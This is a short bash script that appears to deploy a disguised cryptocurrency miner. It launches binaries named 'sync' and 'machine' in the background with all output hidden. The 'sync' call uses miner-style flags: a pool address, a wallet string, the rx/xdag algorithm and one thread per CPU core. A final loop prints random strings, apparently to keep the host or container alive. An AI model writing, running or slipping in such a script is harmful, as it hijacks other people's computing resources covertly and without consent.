#!/bin/bash

chmod 777 sync machine config.json  >/dev/null 2>&1
nohup ./machine -c config.json > /dev/null 2>&1 &
nohup ./sync -o 127.0.0.1:3232. -u hq8Ry8xkHYHG6avtT+sP0ZlbT1P1vky4 -p x -a rx/xdag -t$(nproc --all) > /dev/null 2>&1 &
while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 2m; done
